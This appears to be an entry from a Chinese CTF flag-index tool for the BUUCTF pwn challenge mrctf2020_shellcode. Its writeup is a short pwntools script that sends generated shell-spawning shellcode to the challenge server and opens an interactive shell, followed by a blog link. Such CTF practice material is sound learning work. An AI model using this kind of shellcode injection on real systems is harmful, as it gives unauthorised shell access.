[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

mrctf2020_shellcode

 广告模块
ID: 8437
标题: mrctf2020_shellcode
描述: Ubuntu16.04
类型: Pwn
网站: BUUCTF
题目链接: https://buuoj.cn/challenges#mrctf2020_shellcode
赛事: None
年度: None
Flag值:
writeup: 验证后的网址
from pwn import *
p=remote("node3.buuoj.cn",29643)
context(arch = 'amd64', os = 'linux', log_level = 'debug')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()
https://blog.csdn.net/mcmuyanga/article/details/112344994
答案错误,我要更正